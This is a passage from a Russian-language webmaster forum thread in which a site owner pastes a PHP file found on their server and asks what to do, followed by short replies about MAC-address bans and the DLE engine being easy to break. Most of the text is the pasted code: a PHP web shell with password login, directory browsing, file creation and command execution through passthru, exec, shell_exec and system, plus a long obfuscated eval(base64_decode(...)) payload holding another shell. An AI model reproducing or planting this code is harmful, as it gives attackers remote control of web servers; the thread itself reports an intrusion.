method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td> <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form> </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td> </table>"; } function login() { print "<table border=0 width=100% height=100%><td valign=\"middle\"><center> <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b> <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\"> </form>"; } function reload() { header("Location: ".basename(__FILE__)); } function get_execution_method() { if(function_exists('passthru')){ $m = "passthru"; } if(function_exists('exec')){ $m = "exec"; } if(function_exists('shell_exec')){ $m = "shell_ exec"; } if(function_exists('system')){ $m = "system"; } if(!isset($m)) //No method found :-| { $m = "Disabled"; } return($m); } function execute_command($method,$command) { if($method == "passthru") { passthru($command); } elseif($method == "exec") { exec($command,$result); foreach($result as $output) { print $output."<br>"; } } elseif($method == "shell_exec") { print shell_exec($command); } elseif($method == "system") { system($command); } } function perm($file) { if(file_exists($file)) { return substr(sprintf('%o', fileperms($file)), -4); } else { return "????"; } } function get_color($file) { if(is_writable($file)) { return "green";} if(!is_writable($file) && is_readable($file)) { return "white";} if(!is_writable($file) && !is_readable($file)) { return "red";} } function show_dirs($where) { if(ereg("^c:",realpath($where))) { $dirparts = explode('\\',realpath($where)); } else { $dirparts = explode('/',realpath($where)); } $i = 0; $total = ""; foreach($dirparts as $part) { $p = 0; $pre = ""; while($p != $i) { $pre .= $dirparts[$p]."/"; $p++; } $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/"; $i++; } return "<h2>".$total."</h2><br>"; } print $footer; // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-) exit(); ?>нашол такой php фаил! че делать?
спосибо!
<? eval(base64_decode('JHNoX2lkID0gIlcwTjVZbVZ5SUVGdVlYSmphSGtnVTJobGJHeGQiOw0KJHNoX25hbWUgPSBiYXNl'. 'NjRfZGVjb2RlKCRzaF9pZCk7DQokc2hfbWFpbnVybCA9ICJodHRwOi8vQ3liZXJBbmFyY2h5Lm9y'. 'ZyI7DQokaHRtbF9zdGFydCA9ICc8aHRtbD48aGVhZD4NCjx0aXRsZT4nLmdldGVudigiSFRUUF9I'. 'T1NUIikuJyAtICcuJHNoX25hbWUuJzwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0K'. 'PCEtLQ0KYm9keSx0YWJsZSB7IGZvbnQtZmFtaWx5OnZlcmRhbmE7Zm9udC1zaXplOjExcHg7Y29s'. 'b3I6cmVkO2JhY2tncm91bmQtY29sb3I6YmxhY2s7IH0NCnRhYmxlIHsgd2lkdGg6MTAwJTsgfQ0K'. 'dGFibGUsdGQgeyBib3JkZXI6MXB4IHNvbGlkIGJsYWNrO21hcmdpbi10b3A6MjttYXJnaW4tYm90'. 'dG9tOjI7cGFkZGluZzo1cHg7IH0NCmEgeyBjb2xvcjpsaWdodGJsdWU7dGV4dC1kZWNvcmF0aW9u'. 'Om5vbmU7IH0NCmE6YWN0aXZlIHsgY29sb3I6IzAwRkYwMDsgfQ0KYTpsaW5rIHsgY29sb3I6IzVC'. 'NUJGRjsgfQ0KYTpob3ZlciB7IHRleHQtZGVjb3JhdGlvbjp1bmRlcmxpbmU7IH0NCmE6dmlzaXRl'. 'ZCB7IGNvbG9yOiM5OUNDRkY7IH0NCmlucHV0LHNlbGVjdCxvcHRpb24geyBmb250OjhwdCB0YWhv'. 'bWE7Y29sb3I6cmVkO21hcmdpbjoyO2JvcmRlcjoxcHggc29saWQgbGltZTsgfQ0KdGV4dGFyZWEg'. 'eyBjb2xvcjpsaW1lO2ZvbnQ6dmVyZGFuYSBib2xkO2JvcmRlcjoxcHggc29saWQgbGltZTttYXJn'. 'aW46MjsgfQ0KLmZsZWZ0IHsgZmxvYXQ6bGVmdDt0ZXh0LWFsaWduOmxlZnQ7IH0NCi5mcmlnaHQg'. 'eyBmbG9hdDpyaWdodDt0ZXh0LWFsaWduOnJpZ2h0OyB9DQojcGFnZWJhciB7IGZvbnQ6OHB0IHRh'. 'aG9tYTtwYWRkaW5nOjVweDsgYm9yZGVyOjNweCBzb2xpZCBibGFjazsgYm9yZGVyLWNvbGxhcHNl'. 'OmNvbGxhcHNlOyB9DQojcGFnZWJhciB0ZCB7IHZlcnRpY2FsLWFsaWduOnRvcDsgfQ0KI3BhZ2Vi'. 'YXIgcCB7IGZvbnQ6OHB0IHRhaG9tYTt9DQojcGFnZWJhciBhIHsgZm9udC13ZWlnaHQ6Ym9sZDtj'. 'b2xvcjojMDBGRjAwOyB9DQojcGFnZWJhciBhOnZpc2l0ZWQgeyBjb2xvcjojMDBDRTAwOyB9DQoj'. 'bWFpbm1lbnUgeyB0ZXh0LWFsaWduOmNlbnRlcjsgfQ0KI21haW5tZW51IGEgeyB0ZXh0LWFsaWdu'. 'OiBjZW50ZXI7cGFkZGluZzogMHB4IDVweCAwcHggNXB4OyB9DQojbWFpbmluZm8sLmJhcmhlYWRl'. 'ciwuYmFyaGVhZGVyMiB7IHRleHQtYWxpZ246Y2VudGVyOyB9DQojbWFpbmluZm8gdGQgeyBwYWRk'. 'aW5nOjNweDsgfQ0KLmJhcmhlYWRlciB7IGZvbnQtd2VpZ2h0OmJvbGQ7cGFkZGluZzo1cHg7IH0N'. 'Ci5iYXJoZWFkZXIyIHsgcGFkZGluZzo1cHg7Ym9yZGVyOjJweCBzb2xpZCBibGFjazsgfQ0KLmNv'. 'bnRlbnRzLC5leHBsb3JlciB7IGJvcmRlci1jb2xsYXBzZTpjb2xsYXBzZTt9DQouY29udGVudHMg'. 'dGQgeyB2ZXJ0aWNhbC1hbGlnbjp0b3A7IH0NCi5tYWlucGFuZWwgeyBib3JkZXItY29sbGFwc2U6'. 'Y29sbGFwc2U7cGFkZGluZzo1cHg7IH0NCi5iYXJoZWFkZXIsLm1haW5wYW5lbCB0YWJsZSx0ZCB7'. 'IGJvcmRlcjoxcHggc29saWQgZ3JlZW47IH0NCi5tYWlucGFuZWwgaW5wdXQsc2VsZWN0LG9wdGlv'. 'biB7IGJvcmRlcjoxcHggc29saWQgYmxhY2s7bWFyZ2luOjA7IH0NCmlucHV0W3R5cGU9InN1Ym1p'. 'dCJdIHsgYm9yZGVyOjFweCBzb2xpZCBsaW1lOyB9DQppbnB1dFt0eXBlPSJ0ZXh0Il0geyBwYWRk'. 'aW5nOjNweDt9DQouc2hlbGwgeyBiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrO2NvbG9yOmJsYWNrO3Bh'. 'ZGRpbmc6NXB4OyB9DQouZnhlcnJtc2cgeyBjb2xvcjpyZWQ7IGZvbnQtd2VpZ2h0OmJvbGQ7IH0N'. 'CiNwYWdlYmFyLCNwYWdlYmFyIHAsaDEsaDIsaDMsaDQsZm9ybSB7IG1hcmdpbjowOyB9DQojcGFn'. 'ZWJhciwubWFpbnBhbmVsLGlucHV0W3R5cGU9InN1Ym1pdCJdIHsgYmFja2dyb3VuZC1jb2xvcjpi'. 'bGFjazsgfQ0KLmJhcmhlYWRlcjIsaW5wdXQsc2VsZWN0LG9wdGlvbixpbnB1dFt0eXBlPSJzdWJt'. 'aXQiXTpob3ZlciB7IGJhY2tncm91bmQtY29sb3I6YmxhY2s7IH0NCnRleHRhcmVhLC5tYWlucGFu'. 'ZWwgaW5wdXQsc2VsZWN0LG9wdGlvbiB7IGJhY2tncm91bmQtY29sb3I6IzAwMDAwMDsgfQ0KLy8g'. 'LS0+DQo8L3N0eWxlPg0KPC9oZWFkPg0KPGJvZHk+DQonOw0KJGxvZ2luID0gIiI7IA0KJHBhc3Mg'. 'PSAiIjsNCiRtZDVfcGFzcyA9ICIiOw0KJGhvc3RfYWxsb3cgPSBhcnJheSgiKiIpOyANCiRsb2dp'. 'bl90eHQgPSAiUmVzdHJpY3RlZCBBcmVhIjsgDQokYWNjZXNzZGVuaWVkbWVzcyA9ICI8Ym9keSBi'. 'Z2NvbG9yPWJsYWNrPjxhIGhyZWY9XCIkc2hfbWFpbnVybFwiPjxmb250IGNvbG9yPWxpbWU+Ii4k'. 'c2hfbmFtZS4iPC9mb250PjwvYT46IDxmb250IGNvbG9yPXJlZD5hY2Nlc3MgZGVuaWVkPC9mb250'. 'PjwvYm9keT4iOw0KJGd6aXBlbmNvZGUgPSBUUlVFOw0KJGZpbGVzdGVhbHRoID0gVFJVRTsgDQok'. 'Y3VyZGlyID0gIi4vIjsNCiR0bXBkaXIgPSAiIjsgDQokdG1wZGlyX2xvZyA9ICIuLyI7DQokbG9n'. 'X2VtYWlsID0gInNwaWRlci5yMG90QGdtYWlsLmNvbSI7IA0KJHNvcnRfZGVmYXVsdCA9ICIwYSI7'. 'IA0KJHNvcnRfc2F2ZSA9IFRSVUU7IA0KJHNlc3NfY29va2llID0gImNhcHJpdjh2YXJzIjsgDQok'. 'dXNlZnNidWZmID0gVFJVRTsgDQokY29weV91bnNldCA9IEZBTFNFOyANCiRoZXhkdW1wX2xpbmVz'. 'ID0gODsNCiRoZXhkdW1wX3Jvd3MgPSAyNDsNCiR3aW4gPSBzdHJ0b2xvd2VyKHN1YnN0cihQSFBf'. 'T1MsMCwzKSkgPT0gIndpbiI7DQokZGlzYWJsZWZ1bmMgPSBAaW5pX2dldCgiZGlzYWJsZV9mdW5j'. 'dGlvbnMiKTsNCmlmICghZW1wdHkoJGRpc2FibGVmdW5jKSkgew0KICAkZGlzYWJsZWZ1bmMgPSBz'. 'dHJfcmVwbGFjZSgiICIsIiIsJGRpc2FibGVmdW5jKTsNCiAgJGRpc2FibGVmdW5jID0gZXhwbG9k'. 'ZSgiLCIsJGRpc2FibGVmdW5jKTsNCn0NCmZ1bmN0aW9uIGdldF9waHBpbmkoKSB7DQogIGZ1bmN0'. 'aW9uIFVfd29yZHdyYXAoJHN0cikgew0KICAgICRzdHIgPSBAd29yZHdyYXAoQGh0bWxzcGVjaWFs'. 'Y2hhcnMoJHN0ciksIDEwMCwgJzx3YnIgLz4nLCB0cnVlKTsNCiAgICByZXR1cm4gQHByZWdfcmVw'. 'bGFjZSgnISgmW147XSopPHdiciAvPihbXjtdKjspIScsICckMSQyPHdiciAvPicsICRzdHIpOw0K'. 'ICB9DQogIGZ1bmN0aW9uIFVfdmFsdWUoJHZhbHVlKSB7DQogICAgaWYgKCR2YWx1ZSA9PSAnJykg'. 'cmV0dXJuICc8aT5ubyB2YWx1ZTwvaT4nOw0KICAgIGlmIChAaXNfYm9vbCgkdmFsdWUpKSByZXR1'. 'cm4gJHZhbHVlID8gJ1RSVUUnIDogJ0ZBTFNFJzsNCiAgICBpZiAoJHZhbHVlID09PSBudWxsKSBy'. 'ZXR1cm4gJ05VTEwnOw0KICAgIGlmIChAaXNfb2JqZWN0KCR2YWx1ZSkpICR2YWx1ZSA9IChhcnJh'. 'eSkgJHZhbHVlOw0KICAgIGlmIChAaXNfYXJyYXkoJHZhbHVlKSkgew0KICAgICAgQG9iX3N0YXJ0'. 'KCk7DQogICAgICBwcmludF9yKCR2YWx1ZSk7DQogICAgICAkdmFsdWUgPSBAb2JfZ2V0X2NvbnRl'. 'bnRzKCk7DQogICAgICBAb2JfZW5kX2NsZWFuKCk7DQogICAgfQ0KICAgIHJldHVybiBVX3dvcmR3'. 'cmFwKChzdHJpbmcpICR2YWx1ZSk7DQogIH0NCiAgaWYgKEBmdW5jdGlvbl9leGlzdHMoJ2luaV9n'. 'ZXRfYWxsJykpIHsNCiAgICAkciA9ICIiOw0KICAgIGVjaG8gIjx0YWJsZT48dHIgY2xhc3M9YmFy'. 'aGVhZGVyPjx0ZD5EaXJlY3RpdmU8L3RkPjx0ZD5Mb2NhbCBWYWx1ZTwvdGQ+PHRkPkdsb2JhbCBW'. 'YWx1ZTwvdGQ+PC90cj4iOw0KICAgIGZvcmVhY2ggKEBpbmlfZ2V0X2FsbCgpIGFzICRrZXk9PiR2'. 'YWx1ZSkgew0KICAgICAgJHIgLj0gIjx0cj48dGQ+Ii4ka2V5LiI8L3RkPjx0ZD48ZGl2IGFsaWdu'. 'PWNlbnRlcj4iLlVfdmFsdWUoJHZhbHVlWydsb2NhbF92YWx1ZSddKS4iPC9kaXY+PC90ZD48dGQ+'. 'PGRpdiBhbGlnbj1jZW50ZXI+Ii5VX3ZhbHVlKCR2YWx1ZVsnZ2xvYmFsX3ZhbHVlJ10pLiI8L2Rp'. 'dj48L3RkPjwvdHI+IjsNCiAgICB9DQogICAgZWNobyAkcjsNCiAgICBlY2hvICI8L3RhYmxlPiI7'. 'DQogIH0NCn0NCmZ1bmN0aW9uIGRpc3BfZHJpdmVzKCRjdXJkaXIsJHN1cmwpIHsNCiAgJGxldHRl'. 'cnMgPSAiIjsNCiAgJHYgPSBleHBsb2RlKCJcXCIsJGN1cmRpcik7DQogICR2ID0gJHZbMF07DQog'. 'IGZvcmVhY2ggKHJhbmdlKCJBIiwiWiIpIGFzICRsZXR0ZXIpIHsNCiAgICAkYm9vbCA9ICRpc2Rp'. 'c2tldHRlID0gJGxldHRlciA9PSAiQSI7DQogICAgaWYgKCEkYm9vbCkgeyRib29sID0gaXNfZGly'. 'KCRsZXR0ZXIuIjpcXCIpO30NCiAgICBpZiAoJGJvb2wpIHsNCiAgICAgICRsZXR0ZXJzIC49ICI8'. 'YSBocmVmPVwiIi4kc3VybC4ieD1scyZkPSIudXJsZW5jb2RlKCRsZXR0ZXIuIjpcXCIpLiJcIiIu'. 'DQogICAgICAoJGlzZGlza2V0dGU/IiBvbmNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ01ha2Ugc3Vy'. 'ZSB0aGF0IHRoZSBkaXNrZXR0ZSBpcyBpbnNlcnRlZCBwcm9wZXJseSwgb3RoZXJ3aXNlIGFuIGVy'. 'cm9yIG1heSBvY2N1ci4nKVwiIjoiIikuIj4gWyI7DQogICAgICBpZiAoJGxldHRlci4iOiIgIT0g'. 'JHYpIHskbGV0dGVycyAuPSAkbGV0dGVyO30NCiAgICAgIGVsc2UgeyRsZXR0ZXJzIC49ICI8Zm9u'. 'dCBjb2xvcj15ZWxsb3c+Ii4kbGV0dGVyLiI8L2ZvbnQ+Ijt9DQogICAgICAkbGV0dGVycyAuPSAi'. 'XTwvYT4gIjsNCiAgICB9DQogIH0NCiAgaWYgKCFlbXB0eSgkbGV0dGVycykpIHtSZXR1cm4gJGxl'. 'dHRlcnM7fQ0KICBlbHNlIHtSZXR1cm4gIk5vbmUiO30NCn0NCmlmIChpc19jYWxsYWJsZSgiZGlz'. 'a19mcmVlX3NwYWNlIikpIHsNCiAgZnVuY3Rpb24gZGlzcF9mcmVlc3BhY2UoJGN1cmRydikgew0K'. 'ICAgICRmcmVlID0gZGlza19mcmVlX3NwYWNlKCRjdXJkcnYpOw0KICAgICR0b3RhbCA9IGRpc2tf'. 'dG90YWxfc3BhY2UoJGN1cmRydik7DQogICAgaWYgKCRmcmVlID09PSBGQUxTRSkgeyRmcmVlID0g'. 'MDt9DQogICAgaWYgKCR0b3RhbCA9PT0gRkFMU0UpIHskdG90YWwgPSAwO30NCiAgICBpZiAoJGZy'. 'ZWUgPCAwKSB7JGZyZWUgPSAwO30NCiAgICBpZiAoJHRvdGFsIDwgMCkgeyR0b3RhbCA9IDA7fQ0K'. 'ICAgICR1c2VkID0gJHRvdGFsLSRmcmVlOw0KICAgICRmcmVlX3BlcmNlbnQgPSByb3VuZCgxMDAv'. 'KCR0b3RhbC8kZnJlZSksMikuIiUiOw0KICAgICRmcmVlID0gdmlld19zaXplKCRmcmVlKTsNCiAg'. 'ICAkdG90YWwgPSB2aWV3X3NpemUoJHRvdGFsKTsNCiAgICByZXR1cm4gIiRmcmVlIG9mICR0b3Rh'. 'bCAoJGZyZWVfcGVyY2VudCkiOw0KICB9DQp9DQppZiAoIWZ1bmN0aW9uX2V4aXN0cygibXlzaGVs'. 'bGV4ZWMiKSkgew0KICBpZihpc19jYWxsYWJsZSgicG9wZW4iKSkgew0KICAgIGZ1bmN0aW9uIG15'. 'c2hlbGxleGVjKCRjbWQpIHsNCiAgICAgIGlmICghKCRwPXBvcGVuKCIoJGNtZCkyPiYxIiwiciIp'. 'KSkgeyByZXR1cm4gInBvcGVuIERpc2FibGVkISI7IH0NCiAgICAgIHdoaWxlICghZmVvZigkcCkp'. 'IHsNCiAgICAgICAgJGxpbmU9ZmdldHMoJHAsMTAyNCk7DQogICAgICAgICRvdXQgLj0gJGxpbmU7'. 'DQogICAgICB9DQogICAgICBwY2xvc2UoJHApOw0KICAgICAgcmV0dXJuICRvdXQ7DQogICAgfQ0K'. 'ICB9IGVsc2Ugew0KICAgIGZ1bmN0aW9uIG15c2hlbGxleGVjKCRjbWQpIHsNCiAgICAgIGdsb2Jh'. 'bCAkZGlzYWJsZWZ1bmM7DQogICAgICAkcmVzdWx0ID0gIiI7DQogICAgICBpZiAoIWVtcHR5KCRj'. 'bWQpKSB7DQogICAgICAgIGlmIChpc19jYWxsYWJsZSgiZXhlYyIpIGFuZCAhaW5fYXJyYXkoImV4'. 'ZWMiLCRkaXNhYmxlZnVuYykpIHsNCiAgICAgICAgICBleGVjKCRjbWQsJHJlc3VsdCk7DQogICAg'. 'ICAgICAgJHJlc3VsdCA9IGpvaW4oIlxuIiwkcmVzdWx0KTsNCiAgICAgICAgfSBlbHNlaWYgKCgk'. 'cmVzdWx0ID0gJGNtZCkgIT09IEZBTFNFKSB7DQogICAgICAgIH0gZWxzZWlmIChpc19jYWxsYWJs'. 'ZSgic3lzdGVtIikgYW5kICFpbl9hcnJheSgic3lzdGVtIiwkZGlzYWJsZWZ1bmMpKSB7DQogICAg'. 'ICAgICAgJHYgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7IEBvYl9jbGVhbigpOyBzeXN0ZW0oJGNtZCk7'. 'ICRyZXN1bHQgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7IEBvYl9jbGVhbigpOyBlY2hvICR2Ow0KICAg'. 'ICAgICB9IGVsc2VpZiAoaXNfY2FsbGFibGUoInBhc3N0aHJ1IikgYW5kICFpbl9hcnJheSgicGFz'. 'c3RocnUiLCRkaXNhYmxlZnVuYykpIHsNCiAgICAgICAgICAkdiA9IEBvYl9nZXRfY29udGVudHMo'. 'KTsgQG9iX2NsZWFuKCk7IHBhc3N0aHJ1KCRjbWQpOyAkcmVzdWx0ID0gQG9iX2dldF9jb250ZW50'. 'cygpOyBAb2JfY2xlYW4oKTsgZWNobyAkdjsNCiAgICAgICAgfSBlbHNlaWYgKGlzX3Jlc291cmNl'. 'KCRmcCA9IHBvcGVuKCRjbWQsInIiKSkpIHsNCiAgICAgICAgICAkcmVzdWx0ID0gIiI7DQogICAg'. 'ICAgICAgd2hpbGUoIWZlb2YoJGZwKSkgeyAkcmVzdWx0IC49IGZyZWFkKCRmcCwxMDI0KTsgfQ0K'. 'ICAgICAgICAgIHBjbG9zZSgkZnApOw0KICAgICAgICB9DQogICAgICB9DQogICAgICByZXR1cm4g'. 'JHJlc3VsdDsNCiAgICB9DQogIH0NCn0NCmZ1bmN0aW9uIGV4KCRjZmUpIHsNCiAgJHJlcyA9ICcn'. 'Ow0KICBpZiAoIWVtcHR5KCRjZmUpKSB7DQogICAgaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykp'. 'IHsNCiAgICAgIEBleGVjKCRjZmUsJHJlcyk7DQogICAgICAkcmVzID0gam9pbigiXG4iLCRyZXMp'. 'Ow0KICAgIH0gZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKSB7DQogICAgICAk'. 'cmVzID0gQHNoZWxsX2V4ZWMoJGNmZSk7DQogICAgfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdz'. 'eXN0ZW0nKSkgew0KICAgICAgQG9iX3N0YXJ0KCk7DQogICAgICBAc3lzdGVtKCRjZmUpOw0KICAg'. 'ICAgJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCiAgICAgIEBvYl9lbmRfY2xlYW4oKTsNCiAg'. 'ICB9IGVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1JykpIHsNCiAgICAgIEBvYl9zdGFy'. 'dCgpOw0KICAgICAgQHBhc3N0aHJ1KCRjZmUpOw0KICAgICAgJHJlcyA9IEBvYl9nZXRfY29udGVu'. 'dHMoKTsNCiAgICAgIEBvYl9lbmRfY2xlYW4oKTsNCiAgICB9IGVsc2VpZihAaXNfcmVzb3VyY2Uo'. 'JGYgPSBAcG9wZW4oJGNmZSwiciIpKSkgew0KICAgICAgJHJlcyA9ICIiOw0KICAgICAgd2hpbGUo'. 'IUBmZW9mKCRmKSkgeyAkcmVzIC49IEBmcmVhZCgkZiwxMDI0KTsgfQ0KICAgICAgQHBjbG9zZSgk'. 'Zik7DQogICAgfSBlbHNlIHsgJHJlcyA9ICJFeCgpIERpc2FibGVkISI7IH0NCiAgfQ0KICByZXR1'. 'cm4gJHJlczsNCn0NCmZ1bmN0aW9uIHdoaWNoKCRwcikgew0KICAkcGF0aCA9IGV4KCJ3aGljaCAk'. 'cHIiKTsNCiAgaWYoIWVtcHR5KCRwYXRoKSkgeyByZXR1cm4gJHBhdGg7IH0gZWxzZSB7IHJldHVy'. 'biAkcHI7IH0NCn0NCg0KJGhvc3RuYW1lX3ggPSBwaHBfdW5hbWUobik7DQokaXRzaG9tZSA9IGdl'. ..................... .....................в папке Uploads/fotos ишо такое хрень
-
пипец просто.. наглость или тупость
безпредел растрелать у зобора таких -
Очень не помешало бы, если возможно, выдавать бан по MAC адресу, т.к. ip, логин и т.п. сменить не проблема.
и вчом проблема сменить MAC? IP даже сменит сложнее
ДЛЕ ломают как семечки?
в В помощь вебмастеру
Опубликовано: